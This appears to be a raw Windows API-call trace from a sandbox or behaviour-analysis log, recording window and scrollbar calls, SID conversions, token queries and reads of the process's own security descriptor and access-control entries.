[0201.373] FlatSB_SetScrollInfo (param_1=0xc0140, code=0, psi=0x22effa, fRedraw=1) returned 0
[0201.373] GetWindowLongA (hWnd=0xc0140, nIndex=-16) returned 116326400
[0201.373] IsIconic (hWnd=0xc0140) returned 0
[0201.373] GetClientRect (in: hWnd=0xc0140, lpRect=0x22efbc | out: lpRect=0x22efbc) returned 1
[0201.373] GetWindowLongA (hWnd=0xc0140, nIndex=-16) returned 116326400
[0201.373] IsIconic (hWnd=0xc0140) returned 0
[0201.373] GetClientRect (in: hWnd=0xc0140, lpRect=0x22efbc | out: lpRect=0x22efbc) returned 1
[0201.374] GetWindowLongA (hWnd=0xc0140, nIndex=-16) returned 116326400
[0201.374] IsIconic (hWnd=0xc0140) returned 0
[0201.374] GetClientRect (in: hWnd=0xc0140, lpRect=0x22efbc | out: lpRect=0x22efbc) returned 1
[0201.374] FlatSB_SetScrollProp (param_1=0xc0140, index=0x100, newValue=0x0, param_4=0) returned 0
[0201.374] GetSysColor (nIndex=20) returned 0xffffff
[0201.374] FlatSB_SetScrollProp (param_1=0xc0140, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0201.374] FlatSB_SetScrollInfo (param_1=0xc0140, code=1, psi=0x22effa, fRedraw=1) returned 0
[0201.374] GetWindowLongA (hWnd=0xc0140, nIndex=-16) returned 116326400
[0201.374] IsIconic (hWnd=0xc0140) returned 0
[0201.374] GetClientRect (in: hWnd=0xc0140, lpRect=0x22efbc | out: lpRect=0x22efbc) returned 1
[0201.374] GetCurrentThreadId () returned 0x8e4
[0201.374] ConvertSidToStringSidA () returned 0x1
[0201.374] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0201.374] GetProcAddress (hModule=0x75370000, lpProcName="LocalFree") returned 0x753bca64
[0201.374] LocalFree (hMem=0xb6f40) returned 0x0
[0201.374] LocalFree (hMem=0xa2f90) returned 0x0
[0201.374] ConvertStringSidToSidA () returned 0x1
[0201.374] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a52914, pSourceSid=0xa2f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2a52914*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0201.374] IsValidSid (pSid=0x2a52914*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0201.375] ConvertSidToStringSidA () returned 0x1
[0201.375] LocalFree (hMem=0xb6f40) returned 0x0
[0201.375] LocalFree (hMem=0xa2f90) returned 0x0
[0201.375] ConvertStringSidToSidA () returned 0x1
[0201.375] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a5702c, pSourceSid=0xa2f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2a5702c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0201.375] IsValidSid (pSid=0x2a5702c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0201.375] ConvertSidToStringSidA () returned 0x1
[0201.375] LocalFree (hMem=0xb6f40) returned 0x0
[0201.375] LocalFree (hMem=0xa2f90) returned 0x0
[0201.375] ConvertStringSidToSidA () returned 0x1
[0201.375] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a5f5a0, pSourceSid=0xa2f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2a5f5a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0201.375] IsValidSid (pSid=0x2a5f5a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0201.375] ConvertSidToStringSidA () returned 0x1
[0201.375] LocalFree (hMem=0xb6f40) returned 0x0
[0201.375] LocalFree (hMem=0xa2f90) returned 0x0
[0201.375] ConvertStringSidToSidA () returned 0x1
[0201.375] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a5f614, pSourceSid=0xb6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x2a5f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0201.375] IsValidSid (pSid=0x2a5f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0201.375] ConvertSidToStringSidA () returned 0x1
[0201.375] LocalFree (hMem=0xb6f58) returned 0x0
[0201.375] LocalFree (hMem=0xb6f40) returned 0x0
[0201.375] ConvertStringSidToSidA () returned 0x1
[0201.375] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a5f688, pSourceSid=0xb6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe) | out: pDestinationSid=0x2a5f688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe)) returned 1
[0201.375] IsValidSid (pSid=0x2a5f688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe)) returned 1
[0201.375] ConvertSidToStringSidA () returned 0x1
[0201.375] LocalFree (hMem=0xb6f58) returned 0x0
[0201.375] LocalFree (hMem=0xb6f40) returned 0x0
[0201.375] ConvertStringSidToSidA () returned 0x1
[0201.375] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a5f6fc, pSourceSid=0xb6f58*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0) | out: pDestinationSid=0x2a5f6fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0)) returned 1
[0201.375] IsValidSid (pSid=0x2a5f6fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0)) returned 1
[0201.375] ConvertSidToStringSidA () returned 0x1
[0201.375] LocalFree (hMem=0xac1c8) returned 0x0
[0201.375] LocalFree (hMem=0xb6f58) returned 0x0
[0201.375] ConvertStringSidToSidA () returned 0x1
[0201.375] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a5f770, pSourceSid=0xb6f70*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0) | out: pDestinationSid=0x2a5f770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
[0201.375] IsValidSid (pSid=0x2a5f770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
[0201.375] ConvertSidToStringSidA () returned 0x1
[0201.376] LocalFree (hMem=0xac1c8) returned 0x0
[0201.376] LocalFree (hMem=0xb6f70) returned 0x0
[0201.376] ConvertStringSidToSidA () returned 0x1
[0201.376] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a5f7f8, pSourceSid=0xb6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0) | out: pDestinationSid=0x2a5f7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0)) returned 1
[0201.376] IsValidSid (pSid=0x2a5f7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0)) returned 1
[0201.376] ConvertSidToStringSidA () returned 0x1
[0201.376] LocalFree (hMem=0xac1c8) returned 0x0
[0201.376] LocalFree (hMem=0xb6f40) returned 0x0
[0201.376] ConvertStringSidToSidA () returned 0x1
[0201.376] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a5f880, pSourceSid=0xb6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14) | out: pDestinationSid=0x2a5f880*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14)) returned 1
[0201.376] IsValidSid (pSid=0x2a5f880*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14)) returned 1
[0201.376] ConvertSidToStringSidA () returned 0x1
[0201.376] LocalFree (hMem=0xb6f58) returned 0x0
[0201.376] LocalFree (hMem=0xb6f40) returned 0x0
[0201.376] ConvertStringSidToSidA () returned 0x1
[0201.376] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a5f90c, pSourceSid=0xb6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13) | out: pDestinationSid=0x2a5f90c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13)) returned 1
[0201.376] IsValidSid (pSid=0x2a5f90c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13)) returned 1
[0201.376] ConvertSidToStringSidA () returned 0x1
[0201.376] LocalFree (hMem=0xb6f58) returned 0x0
[0201.376] LocalFree (hMem=0xb6f40) returned 0x0
[0201.376] ConvertStringSidToSidA () returned 0x1
[0201.376] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a5f998, pSourceSid=0xb6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa) | out: pDestinationSid=0x2a5f998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa)) returned 1
[0201.376] IsValidSid (pSid=0x2a5f998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa)) returned 1
[0201.376] ConvertSidToStringSidA () returned 0x1
[0201.376] LocalFree (hMem=0xb6f58) returned 0x0
[0201.376] LocalFree (hMem=0xb6f40) returned 0x0
[0201.376] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0201.376] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentThread") returned 0x753c3351
[0201.376] GetCurrentThread () returned 0xfffffffe
[0201.377] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0201.377] GetProcAddress (hModule=0x76da0000, lpProcName="OpenThreadToken") returned 0x76db432c
[0201.377] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0xf01ff, OpenAsSelf=1, TokenHandle=0x22e87c | out: TokenHandle=0x22e87c*=0x2933756) returned 0
[0201.377] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0201.377] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentProcess") returned 0x753bcdcf
[0201.377] GetCurrentProcess () returned 0xffffffff
[0201.377] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0201.377] GetProcAddress (hModule=0x76da0000, lpProcName="OpenProcessToken") returned 0x76db4304
[0201.377] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0xf01ff, TokenHandle=0x2a5fa3c | out: TokenHandle=0x2a5fa3c*=0x1d0) returned 1
[0201.377] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0201.377] GetProcAddress (hModule=0x76da0000, lpProcName="MapGenericMask") returned 0x76dc7a73
[0201.377] MapGenericMask (in: AccessMask=0x22e6f4, GenericMapping=0x22e6f8 | out: AccessMask=0x22e6f4)
[0201.377] MapGenericMask (in: AccessMask=0x22e828, GenericMapping=0x22e82c | out: AccessMask=0x22e828)
[0201.378] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0201.378] GetProcAddress (hModule=0x76da0000, lpProcName="GetTokenInformation") returned 0x76db431c
[0201.378] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x22e83c | out: TokenInformation=0x0, ReturnLength=0x22e83c) returned 0
[0201.378] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0201.378] GetProcAddress (hModule=0x75370000, lpProcName="GetLastError") returned 0x753bbf00
[0201.378] GetLastError () returned 0x7a
[0201.378] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0201.378] GetProcAddress (hModule=0x75370000, lpProcName="HeapAlloc") returned 0x76f72dd6
[0201.378] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0xb0780, TokenInformationLength=0x24, ReturnLength=0x22e860 | out: TokenInformation=0xb0780, ReturnLength=0x22e860) returned 1
[0201.378] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a5fab0, pSourceSid=0xb0788*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)) | out: pDestinationSid=0x2a5fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0201.378] IsValidSid (pSid=0x2a5fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0201.378] ConvertSidToStringSidA () returned 0x1
[0201.378] LocalFree (hMem=0xa9e80) returned 0x0
[0201.379] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0201.379] GetProcAddress (hModule=0x75370000, lpProcName="HeapFree") returned 0x753bbbd0
[0201.379] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a5fb34, pSourceSid=0x2a5fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)) | out: pDestinationSid=0x2a5fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0201.379] IsValidSid (pSid=0x2a5fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0201.379] ConvertSidToStringSidA () returned 0x1
[0201.379] LocalFree (hMem=0xa9e80) returned 0x0
[0201.379] IsValidSid (pSid=0x2a5fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0201.379] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0201.379] GetProcAddress (hModule=0x75370000, lpProcName="CloseHandle") returned 0x753bca7c
[0201.379] CloseHandle (hObject=0x1d0) returned 1
[0201.379] ConvertStringSidToSidA () returned 0x1
[0201.379] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a5fa54, pSourceSid=0xb6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000) | out: pDestinationSid=0x2a5fa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000)) returned 1
[0201.379] IsValidSid (pSid=0x2a5fa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000)) returned 1
[0201.379] ConvertSidToStringSidA () returned 0x1
[0201.379] LocalFree (hMem=0xb6f58) returned 0x0
[0201.379] LocalFree (hMem=0xb6f40) returned 0x0
[0201.379] ConvertStringSidToSidA () returned 0x1
[0201.379] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a5fae0, pSourceSid=0xb6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000) | out: pDestinationSid=0x2a5fae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 1
[0201.379] IsValidSid (pSid=0x2a5fae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 1
[0201.379] ConvertSidToStringSidA () returned 0x1
[0201.379] LocalFree (hMem=0xb6f58) returned 0x0
[0201.380] LocalFree (hMem=0xb6f40) returned 0x0
[0201.380] ConvertStringSidToSidA () returned 0x1
[0201.380] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a5fbfc, pSourceSid=0xb6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000) | out: pDestinationSid=0x2a5fbfc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 1
[0201.380] IsValidSid (pSid=0x2a5fbfc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 1
[0201.380] ConvertSidToStringSidA () returned 0x1
[0201.380] LocalFree (hMem=0xb6f58) returned 0x0
[0201.380] LocalFree (hMem=0xb6f40) returned 0x0
[0201.380] ConvertStringSidToSidA () returned 0x1
[0201.380] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a5fc8c, pSourceSid=0xb6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000) | out: pDestinationSid=0x2a5fc8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 1
[0201.380] IsValidSid (pSid=0x2a5fc8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 1
[0201.380] ConvertSidToStringSidA () returned 0x1
[0201.380] LocalFree (hMem=0xb6f58) returned 0x0
[0201.380] LocalFree (hMem=0xb6f40) returned 0x0
[0201.380] ConvertStringSidToSidA () returned 0x1
[0201.380] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a5fd1c, pSourceSid=0xb6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000) | out: pDestinationSid=0x2a5fd1c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000)) returned 1
[0201.380] IsValidSid (pSid=0x2a5fd1c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000)) returned 1
[0201.380] ConvertSidToStringSidA () returned 0x1
[0201.380] LocalFree (hMem=0xb6f58) returned 0x0
[0201.380] LocalFree (hMem=0xb6f40) returned 0x0
[0201.380] GetCurrentProcessId () returned 0x8e8
[0201.380] OpenProcess (dwDesiredAccess=0x60000, bInheritHandle=0, dwProcessId=0x8e8) returned 0x1d0
[0201.380] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0201.381] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityInfo") returned 0x76dab3e4
[0201.381] GetSecurityInfo () returned 0x0
[0201.384] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0201.384] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorControl") returned 0x76daaddf
[0201.385] GetSecurityDescriptorControl (in: pSecurityDescriptor=0xb0f28, pControl=0x22e602, lpdwRevision=0x22e5fc | out: pControl=0x22e602, lpdwRevision=0x22e5fc) returned 1
[0201.385] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0201.385] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorOwner") returned 0x76daadf7
[0201.385] GetSecurityDescriptorOwner (in: pSecurityDescriptor=0xb0f28, pOwner=0x22e5f8, lpbOwnerDefaulted=0x22e5ec | out: pOwner=0x22e5f8*=0x0, lpbOwnerDefaulted=0x22e5ec) returned 1
[0201.385] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0201.385] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorGroup") returned 0x76daae27
[0201.385] GetSecurityDescriptorGroup (in: pSecurityDescriptor=0xb0f28, pGroup=0x22e5f8, lpbGroupDefaulted=0x22e5ec | out: pGroup=0x22e5f8*=0x0, lpbGroupDefaulted=0x22e5ec) returned 1
[0201.385] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0201.385] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorDacl") returned 0x76db41a6
[0201.385] GetSecurityDescriptorDacl (in: pSecurityDescriptor=0xb0f28, lpbDaclPresent=0x22e5f0, pDacl=0x22e5e4, lpbDaclDefaulted=0x22e5ec | out: lpbDaclPresent=0x22e5f0, pDacl=0x22e5e4, lpbDaclDefaulted=0x22e5ec) returned 1
[0201.385] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0201.385] GetProcAddress (hModule=0x76da0000, lpProcName="IsValidAcl") returned 0x76da8523
[0201.386] IsValidAcl (pAcl=0xb0f3c) returned 1
[0201.386] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0201.386] GetProcAddress (hModule=0x76da0000, lpProcName="GetAce") returned 0x76db45f0
[0201.386] GetAce (in: pAcl=0xb0f3c, dwAceIndex=0x0, pAce=0x22e484 | out: pAce=0x22e484*=0xb0f44) returned 1
[0201.386] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a5fe74, pSourceSid=0xb0f4c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2a5fe74*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0201.386] IsValidSid (pSid=0x2a5fe74*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0201.386] ConvertSidToStringSidA () returned 0x1
[0201.386] LocalFree (hMem=0xb7018) returned 0x0
[0201.386] GetAce (in: pAcl=0xb0f3c, dwAceIndex=0x1, pAce=0x22e484 | out: pAce=0x22e484*=0xb0f5c) returned 1
[0201.386] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a5ff60, pSourceSid=0xb0f64*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x2a5ff60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0201.386] IsValidSid (pSid=0x2a5ff60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0201.386] ConvertSidToStringSidA () returned 0x1
[0201.386] LocalFree (hMem=0xb7018) returned 0x0
[0201.386] GetAce (in: pAcl=0xb0f3c, dwAceIndex=0x2, pAce=0x22e484 | out: pAce=0x22e484*=0xb0f70) returned 1
[0201.386] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a529c0, pSourceSid=0xb0f78*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0)) | out: pDestinationSid=0x2a529c0*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0))) returned 1
